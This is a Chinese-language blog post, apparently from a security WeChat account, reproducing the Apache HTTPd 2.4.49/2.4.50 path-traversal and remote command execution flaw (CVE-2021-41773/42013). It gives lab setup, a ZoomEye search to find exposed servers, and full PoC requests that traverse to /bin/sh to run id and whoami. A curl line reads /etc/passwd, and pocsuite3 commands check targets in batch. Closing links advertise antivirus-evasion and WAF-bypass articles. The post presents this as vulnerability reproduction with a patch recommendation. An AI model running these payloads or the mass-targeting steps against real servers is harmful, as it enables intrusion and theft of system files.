0x01 漏洞簡介:
Apache HTTPd是Apache基金會開源的一款流行的HTTP伺服器。在Apache HTTPd 2.4.49版本中,存在一個 路徑穿越漏洞。在配置了 Require all granted後,攻擊者可利用路徑穿越漏洞讀取到Web目錄之外的其他文件,比 如/etc/passwd文件。同時若Apache HTTPd開啟了cgi支持,並能夠訪問到/bin/sh的情況下,攻擊者可構造惡意請 求執行命令,從而控制伺服器,危害嚴重。
0x02 影響版本:
ApacheHTTPd 2.4.49 ApacheHTTPd 2.4.500x03 漏洞等級:
0x04 環境搭建:
這裡提供兩個搭建方法可自行選擇
docker部署命令(一):
docker pull blueteamsteve/cve-2021-41773:with-cgiddocker run -d -p 7006:80 blueteamsteve/cve-2021-41773:with-cgid
搭建成功訪問是這個醬紫!
docker部署命令(二):
git clonehttps://github.com/blasty/CVE-2021-41773.gitcd CVE-2021-41773/docker-compose build docker-compose up -d
搭建成功訪問是這個醬紫!
0x05 影響範圍:
根據ZoomEye網絡空間搜尋引擎對潛在可能目標進行搜索,共得到 566,346 條IP歷史記錄。
ZoomEye語法:
app:"apache web server 2.4.49 2.4.50"
ZoomEye搜索連結:
https://www.zoomeye.org/searchResult?q=app%3A%22apache%20web%20server%202.4.49%202.4.50%22
0x06 漏洞復現:
PoC:
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9If-None-Match: "29cd-5ce4665e39700-gzip"If-Modified-Since: Thu, 14 Oct 2021 01:57:16 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 39
echo Content-Type: text/plain; echo; id
POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9If-None-Match: "29cd-5ce4665e39700-gzip"If-Modified-Since: Thu, 14 Oct 2021 01:57:16 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 12
echo; whoami
curl --data "echo;cat /etc/passwd" 'http://ip:port/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh'
單個檢測命令如下:
python3 .\cli.py -r .\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -u https://*.*.*.* --verify
批量檢測命令如下:
python3 .\cli.py -r .\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -f 1.txt --verify獲取腳本直達車↓↓↓
https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py說到這裡就簡要介紹一下個人感覺非常好用的一款神器pocsuite3
PocSuite3是Knownsec 404安全研究團隊設計的一款遠程漏洞測試以及PoC開發框架,該框架使用了功能極其強大的概念驗證引擎,並自帶了大量滲透測試以及安全分析功能。
功能介紹1、PoC腳本能夠以attack、verify和shell等多種模式運行;2、自帶插件生態系統;3、 可從本地文件、Redis和資料庫等不同來源動態加載PoC腳本;4、 可從CIDR、本地文件、Redis、資料庫、Zoomeye和Shodan等來源加載多個測試目標;5、 輕鬆導出測試結果;6、 支持命令行工具和Python包導入;7、 支持IPv6;8、 支持全局HTTP/HTTPS/SOCKS代理;9、 提供了強大的爬蟲API;10、整合Seebug;11、整合ZoomEye;12、整合Shodan;13、整合Ceye;14、等等…關於pocsuite3的詳細使用可以借鑑這個文檔,這裡不一一介紹!因為文檔比較詳細
https://github.com/knownsec/pocsuite3/tree/master/docs
0x07 建議解決方案:
若低於2.4.49版本,可不升級若Apache HTTPd為 2.4.49、2.4.50版本,請儘快升級至安全版本0x08 參考連結:
https://mp.weixin.qq.com/s/Hpl5hMJYr7DtXyAeVuNwWQhttps://mp.weixin.qq.com/s/y1IWrujFBPduKcecwHtGnA【往期回顧】
【往期推薦】
【內網滲透】內網信息收集命令匯總
【內網滲透】域內信息收集命令匯總
【超詳細 | Python】CS免殺-Shellcode Loader原理(python)
【超詳細 | Python】CS免殺-分離+混淆免殺思路
【超詳細 | 鍾馗之眼】ZoomEye-python命令行的使用
【超詳細 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞復現
【超詳細】CVE-2020-14882 | Weblogic未授權命令執行漏洞復現
【超詳細 | 附PoC】CVE-2021-2109 | Weblogic Server遠程代碼執行漏洞復現
【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 遠程代碼執行漏洞
【CNVD-2021-30167 | 附PoC】用友NC BeanShell遠程代碼執行漏洞復現
【超詳細】Microsoft Exchange 遠程代碼執行漏洞復現【CVE-2020-17144】
【超詳細】Fastjson1.2.24反序列化漏洞復現
記一次HW實戰筆記 | 艱難的提權爬坑
【乾貨】最全的Tomcat漏洞復現
{Vulhub漏洞復現(一)ActiveMQ}
{Vulhub漏洞復現(二) Apereo CAS}
Cobalt Strike免殺腳本生成器|cna腳本|bypassAV
xss bypass備忘單|xss繞過防火牆技巧|xss繞過WAF的方法
走過路過的大佬們留個關注再走唄
往期文章有彩蛋哦
一如既往的學習,一如既往的整理,一如即往的分享
「如侵權請私聊公眾號刪文」